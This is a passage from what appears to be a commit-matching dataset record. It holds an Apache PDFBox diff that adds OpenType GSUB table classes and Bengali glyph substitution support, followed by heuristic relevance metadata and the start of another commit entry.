defaultLangSysTable, Map langSysTables)", + "+ {", + "+ this.defaultLangSysTable = defaultLangSysTable;", + "+ this.langSysTables = langSysTables;", + "+ }", + "+", + "+ public LangSysTable getDefaultLangSysTable()", + "+ {", + "+ return defaultLangSysTable;", + "+ }", + "+", + "+ public Map getLangSysTables()", + "+ {", + "+ return langSysTables;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"ScriptTable[hasDefault=%s,langSysRecordsCount=%d]\",", + "+ defaultLangSysTable != null, langSysTables.size());", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", + "new file mode 100644", + "index 000000000..dce4f43fd", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", + "@@ -0,0 +1,26 @@", + "+", + "+", + "+", + "+", + "+", + "+", + "+", + "+This package contains the highly obfuscated Layout Common Table Formats system of tables from the Open Type Font specs. ", + "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", + "+", + "+", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", + "new file mode 100644", + "index 000000000..a38443870", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", + "@@ -0,0 +1,58 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.gsub;", + "+", + "+/**", + "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", + "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", + "+ * 4: Ligature Substitution Subtable. It specifically models the LigatureSet table:", + "+ * All ligatures beginning with the same glyph.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LigatureSetTable", + "+{", + "+ private final int ligatureCount;", + "+ private final LigatureTable[] ligatureTables;", + "+", + "+ public LigatureSetTable(int ligatureCount, LigatureTable[] ligatureTables)", + "+ {", + "+ this.ligatureCount = ligatureCount;", + "+ this.ligatureTables = ligatureTables;", + "+ }", + "+", + "+ public int getLigatureCount()", + "+ {", + "+ return ligatureCount;", + "+ }", + "+", + "+ public LigatureTable[] getLigatureTables()", + "+ {", + "+ return ligatureTables;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"%s[ligatureCount=%d]\", LigatureSetTable.class.getSimpleName(),", + "+ ligatureCount);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", + "new file mode 100644", + "index 000000000..34607ca9e", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", + "@@ -0,0 +1,65 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.gsub;", + "+", + "+/**", + "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", + "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", + "+ * 4: Ligature Substitution Subtable. It specifically models the", + "+ * Ligature", + "+ * table: Glyph components for one ligature.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LigatureTable", + "+{", + "+ private final int ligatureGlyph;", + "+ private final int componentCount;", + "+ private final int[] componentGlyphIDs;", + "+", + "+ public LigatureTable(int ligatureGlyph, int componentCount, int[] componentGlyphIDs)", + "+ {", + "+ this.ligatureGlyph = ligatureGlyph;", + "+ this.componentCount = componentCount;", + "+ this.componentGlyphIDs = componentGlyphIDs;", + "+ }", + "+", + "+ public int getLigatureGlyph()", + "+ {", + "+ return ligatureGlyph;", + "+ }", + "+", + "+ public int getComponentCount()", + "+ {", + "+ return componentCount;", + "+ }", + "+", + "+ public int[] getComponentGlyphIDs()", + "+ {", + "+ return componentGlyphIDs;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"%s[ligatureGlyph=%d, componentCount=%d]\",", + "+ LigatureTable.class.getSimpleName(), ligatureGlyph, componentCount);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", + "new file mode 100644", + "index 000000000..8a776b048", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", + "@@ -0,0 +1,62 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.gsub;", + "+", + "+import org.apache.fontbox.ttf.table.common.CoverageTable;", + "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", + "+", + "+/**", + "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", + "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", + "+ * 4: Ligature Substitution Subtable. It specifically models the", + "+ * Ligature", + "+ * Substitution Format 1.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LookupTypeLigatureSubstitutionSubstFormat1 extends LookupSubTable", + "+{", + "+ private final LigatureSetTable[] ligatureSetTables;", + "+", + "+ public LookupTypeLigatureSubstitutionSubstFormat1(int substFormat, CoverageTable coverageTable,", + "+ LigatureSetTable[] ligatureSetTables)", + "+ {", + "+ super(substFormat, coverageTable);", + "+ this.ligatureSetTables = ligatureSetTables;", + "+ }", + "+", + "+ @Override", + "+ public int doSubstitution(int gid, int coverageIndex)", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ public LigatureSetTable[] getLigatureSetTables()", + "+ {", + "+ return ligatureSetTables;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"%s[substFormat=%d]\",", + "+ LookupTypeLigatureSubstitutionSubstFormat1.class.getSimpleName(), getSubstFormat());", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", + "new file mode 100644", + "index 000000000..b7bfdeec6", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", + "@@ -0,0 +1,62 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.gsub;", + "+", + "+import org.apache.fontbox.ttf.table.common.CoverageTable;", + "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", + "+", + "+/**", + "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", + "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", + "+ * 1: Single Substitution Subtable. It specifically models the", + "+ * Single", + "+ * Substitution Format 1.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LookupTypeSingleSubstFormat1 extends LookupSubTable", + "+{", + "+ private final short deltaGlyphID;", + "+", + "+ public LookupTypeSingleSubstFormat1(int substFormat, CoverageTable coverageTable,", + "+ short deltaGlyphID)", + "+ {", + "+ super(substFormat, coverageTable);", + "+ this.deltaGlyphID = deltaGlyphID;", + "+ }", + "+", + "+ @Override", + "+ public int doSubstitution(int gid, int coverageIndex)", + "+ {", + "+ return coverageIndex < 0 ? gid : gid + deltaGlyphID;", + "+ }", + "+", + "+ public short getDeltaGlyphID()", + "+ {", + "+ return deltaGlyphID;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"LookupTypeSingleSubstFormat1[substFormat=%d,deltaGlyphID=%d]\",", + "+ getSubstFormat(), deltaGlyphID);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", + "new file mode 100644", + "index 000000000..38841ec7f", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", + "@@ -0,0 +1,65 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.gsub;", + "+", + "+import java.util.Arrays;", + "+", + "+import org.apache.fontbox.ttf.table.common.CoverageTable;", + "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", + "+", + "+/**", + "+ * This class is a part of the GSUB \u00e2\u0080\u0094 Glyph", + "+ * Substitution Table system of tables in the Open Type Font specs. This is a part of the LookupType", + "+ * 1: Single Substitution Subtable. It specifically models the", + "+ * Single", + "+ * Substitution Format 2.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LookupTypeSingleSubstFormat2 extends LookupSubTable", + "+{", + "+ private final int[] substituteGlyphIDs;", + "+", + "+ public LookupTypeSingleSubstFormat2(int substFormat, CoverageTable coverageTable,", + "+ int[] substituteGlyphIDs)", + "+ {", + "+ super(substFormat, coverageTable);", + "+ this.substituteGlyphIDs = substituteGlyphIDs;", + "+ }", + "+", + "+ @Override", + "+ public int doSubstitution(int gid, int coverageIndex)", + "+ {", + "+ return coverageIndex < 0 ? gid : substituteGlyphIDs[coverageIndex];", + "+ }", + "+", + "+ public int[] getSubstituteGlyphIDs()", + "+ {", + "+ return substituteGlyphIDs;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(", + "+ \"LookupTypeSingleSubstFormat2[substFormat=%d,substituteGlyphIDs=%s]\",", + "+ getSubstFormat(), Arrays.toString(substituteGlyphIDs));", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", + "new file mode 100644", + "index 000000000..749617e1d", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", + "@@ -0,0 +1,26 @@", + "+", + "+", + "+", + "+", + "+", + "+", + "+", + "+This package contains the highly obfuscated GSUB, aka, Glyph Substitution Table system of tables from the Open Type Font specs. ", + "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables in the GSUB sub-category, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", + "+", + "+", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", + "new file mode 100644", + "index 000000000..026cc9984", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", + "@@ -0,0 +1,26 @@", + "+", + "+", + "+", + "+", + "+", + "+", + "+", + "+This package contains the highly obfuscated Font tables from the Open Type Font specs. ", + "+This package makes an honest attempt to closely model these highly obfuscated OTF Tables, in their raw glory, as close as possible to their original nonsensical forms, without any spite or bias.", + "+", + "+", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index fb5acaf9a..de27a5f4c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -20,2 +20,3 @@ import java.awt.geom.AffineTransform;", + " import java.awt.geom.PathIterator;", + "+import java.io.ByteArrayOutputStream;", + " import java.io.Closeable;", + "@@ -23,3 +24,9 @@ import java.io.IOException;", + " import java.io.OutputStream;", + "+import java.util.ArrayList;", + "+import java.util.HashSet;", + "+import java.util.List;", + "+import java.util.Map;", + "+import java.util.Set;", + " import java.util.Stack;", + "+import java.util.regex.Pattern;", + "@@ -27,2 +34,6 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.CmapLookup;", + "+import org.apache.fontbox.ttf.gsub.CompoundCharacterTokenizer;", + "+import org.apache.fontbox.ttf.gsub.GsubWorker;", + "+import org.apache.fontbox.ttf.gsub.GsubWorkerForBengali;", + " import org.apache.pdfbox.contentstream.PDAbstractContentStream;", + "@@ -35,2 +46,3 @@ import org.apache.pdfbox.pdmodel.documentinterchange.markedcontent.PDPropertyLis", + " import org.apache.pdfbox.pdmodel.font.PDFont;", + "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", + " import org.apache.pdfbox.pdmodel.graphics.PDXObject;", + "@@ -41,2 +53,3 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDSeparation;", + "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", + " import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + "@@ -314,2 +327,25 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "+ byte[] encodedText = null;", + "+", + "+ if (font instanceof PDType0Font)", + "+ {", + "+ PDType0Font pdType0Font = (PDType0Font) font;", + "+ Map, Integer>> glyphSubstitutionMap = pdType0Font", + "+ .getGlyphSubstitutionMap();", + "+ if (!glyphSubstitutionMap.isEmpty())", + "+ {", + "+ Set glyphIds = new HashSet<>();", + "+ encodedText = encodeForGsub(glyphSubstitutionMap, glyphIds, pdType0Font, text);", + "+ if (pdType0Font.willBeSubset())", + "+ {", + "+ pdType0Font.addGlyphsToSubset(glyphIds);", + "+ }", + "+ }", + "+ }", + "+", + "+ if (encodedText == null)", + "+ {", + "+ encodedText = font.encode(text);", + "+ }", + "+", + " // Unicode code points to keep when subsetting", + "@@ -1142,2 +1178,64 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " }", + "+", + "+ private byte[] encodeForGsub(Map, Integer>> glyphSubstitutionMap,", + "+ Set glyphIds, PDType0Font font, String text) throws IOException", + "+ {", + "+", + "+ String spaceRegexPattern = \"\\\\s\";", + "+ Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", + "+", + "+ // break the entire chunk of text into words by splitting it with space", + "+ List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", + "+", + "+ ByteArrayOutputStream out = new ByteArrayOutputStream();", + "+", + "+ for (String word : words)", + "+ {", + "+ if (spaceRegex.matcher(word).matches())", + "+ {", + "+ out.write(font.encode(word));", + "+ }", + "+ else", + "+ {", + "+ glyphIds.addAll(applyGSUBRules(out, font, glyphSubstitutionMap, word));", + "+ }", + "+ }", + "+", + "+ return out.toByteArray();", + "+ }", + "+", + "+ private List applyGSUBRules(ByteArrayOutputStream out, PDType0Font font,", + "+ Map, Integer>> glyphSubstitutionMap, String word)", + "+ throws IOException", + "+ {", + "+ List originalGlyphIds = new ArrayList<>();", + "+ CmapLookup cmapLookup = font.getCmapLookup();", + "+", + "+ // convert characters into glyphIds", + "+ for (char unicodeChar : word.toCharArray())", + "+ {", + "+ int glyphId = cmapLookup.getGlyphId(unicodeChar);", + "+ if (glyphId <= 0)", + "+ {", + "+ throw new IllegalStateException(", + "+ \"could not find the glyphId for the character: \" + unicodeChar);", + "+ }", + "+ originalGlyphIds.add(glyphId);", + "+ }", + "+", + "+ // TODO: figure out how to get this language-specific detail up here", + "+ GsubWorker gsubWorker = new GsubWorkerForBengali(cmapLookup, glyphSubstitutionMap);", + "+", + "+ List repositionedGlyphIds = gsubWorker.repositionGlyphs(originalGlyphIds);", + "+ List glyphIdsAfterGsub = gsubWorker.substituteGlyphs(repositionedGlyphIds);", + "+", + "+ for (Integer glyphId : glyphIdsAfterGsub)", + "+ {", + "+ out.write(font.encodeGlyphId(glyphId));", + "+ }", + "+", + "+ return glyphIdsAfterGsub;", + "+", + "+ }", + "+", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", + "index c6a6346cd..9fab519ff 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", + "@@ -371,2 +371,4 @@ public abstract class PDCIDFont implements COSObjectable, PDFontLike, PDVectorFo", + "+ public abstract byte[] encodeGlyphId(int glyphId);", + "+", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", + "index 6600ec8d3..c4e224be3 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", + "@@ -404,2 +404,8 @@ public class PDCIDFontType0 extends PDCIDFont", + "+ @Override", + "+ public byte[] encodeGlyphId(int glyphId)", + "+ {", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + " @Override", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", + "index 859f118b8..675736d3e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", + "@@ -363,4 +363,10 @@ public class PDCIDFontType2 extends PDCIDFont", + "+ return encodeGlyphId(cid);", + "+ }", + "+", + "+ @Override", + "+ public byte[] encodeGlyphId(int glyphId)", + "+ {", + " // CID is always 2-bytes (16-bit) for TrueType", + "- return new byte[] { (byte)(cid >> 8 & 0xff), (byte)(cid & 0xff) };", + "+ return new byte[] { (byte)(glyphId >> 8 & 0xff), (byte)(glyphId & 0xff) };", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index 9fb8a615d..cd205868e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -22,4 +22,8 @@ import java.io.IOException;", + " import java.io.InputStream;", + "+import java.util.Collections;", + " import java.util.HashSet;", + "+import java.util.List;", + "+import java.util.Map;", + " import java.util.Set;", + "+", + " import org.apache.commons.logging.Log;", + "@@ -27,2 +31,3 @@ import org.apache.commons.logging.LogFactory;", + " import org.apache.fontbox.cmap.CMap;", + "+import org.apache.fontbox.ttf.CmapLookup;", + " import org.apache.fontbox.ttf.TTFParser;", + "@@ -49,2 +54,4 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " private final Set noUnicode = new HashSet<>(); ", + "+ private final Map, Integer>> glyphSubstitutionMap;", + "+ private final CmapLookup cmapLookup;", + " private CMap cMap, cMapUCS2;", + "@@ -54,3 +61,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " private TrueTypeFont ttf;", + "- ", + "+", + " /**", + "@@ -64,2 +71,6 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " super(fontDictionary);", + "+", + "+ glyphSubstitutionMap = Collections.emptyMap();", + "+ cmapLookup = null;", + "+", + " COSBase base = dict.getDictionaryObject(COSName.DESCENDANT_FONTS);", + "@@ -94,2 +105,6 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " }", + "+", + "+ glyphSubstitutionMap = ttf.getGlyphSubstitutionMap();", + "+ cmapLookup = ttf.getUnicodeCmapLookup();", + "+", + " embedder = new PDCIDFontType2Embedder(document, dict, ttf, embedSubset, this, vertical);", + "@@ -234,2 +249,11 @@ public class PDType0Font extends PDFont implements PDVectorFont", + "+ public void addGlyphsToSubset(Set glyphIds)", + "+ {", + "+ if (!willBeSubset())", + "+ {", + "+ throw new IllegalStateException(\"This font was created with subsetting disabled\");", + "+ }", + "+ embedder.addGlyphIds(glyphIds);", + "+ }", + "+", + " @Override", + "@@ -576,2 +600,18 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " }", + "+", + "+ public Map, Integer>> getGlyphSubstitutionMap()", + "+ {", + "+ return glyphSubstitutionMap;", + "+ }", + "+", + "+ public byte[] encodeGlyphId(int glyphId)", + "+ {", + "+ return descendantFont.encodeGlyphId(glyphId);", + "+ }", + "+", + "+ public CmapLookup getCmapLookup()", + "+ {", + "+ return cmapLookup;", + "+ }", + "+", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", + "index 00ec05aab..e2cddee28 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java", + "@@ -72,2 +72,4 @@ abstract class TrueTypeEmbedder implements Subsetter", + "+ private final Set allGlyphIds = new HashSet<>();", + "+", + " /**", + "@@ -285,2 +287,7 @@ abstract class TrueTypeEmbedder implements Subsetter", + "+ public void addGlyphIds(Set glyphIds)", + "+ {", + "+ allGlyphIds.addAll(glyphIds);", + "+ }", + "+", + " @Override", + "@@ -316,2 +323,7 @@ abstract class TrueTypeEmbedder implements Subsetter", + "+ if (!allGlyphIds.isEmpty())", + "+ {", + "+ subsetter.addGlyphIds(allGlyphIds);", + "+ }", + "+", + " // calculate deterministic tag based on the chosen subset" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "examples/src/main/resources/org/apache/pdfbox/resources/ttf/bengali-correct-text.png", + "fontbox/src/main/java/org/apache/fontbox/ttf/GlyphSubstitutionTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/common/package.html", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureSetTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LigatureTable.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeLigatureSubstitutionSubstFormat1.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat1.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/LookupTypeSingleSubstFormat2.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/gsub/package.html", + "fontbox/src/main/java/org/apache/fontbox/ttf/table/package.html", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFont.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType0.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDCIDFontType2.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/TrueTypeEmbedder.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "RELEVANT_WORDS_IN_MESSAGE", + "message": "The commit message contains some relevant words: PDF", + "relevance": 8 + }, + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "0d8596b921272a506cc656a9d283bf891c4b9f86", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531201468, + "hunks": 2, + "message": "PDFBOX-4256: use Off as the default value for a button field in case there is no value set -> see PDF spec git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835515 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + 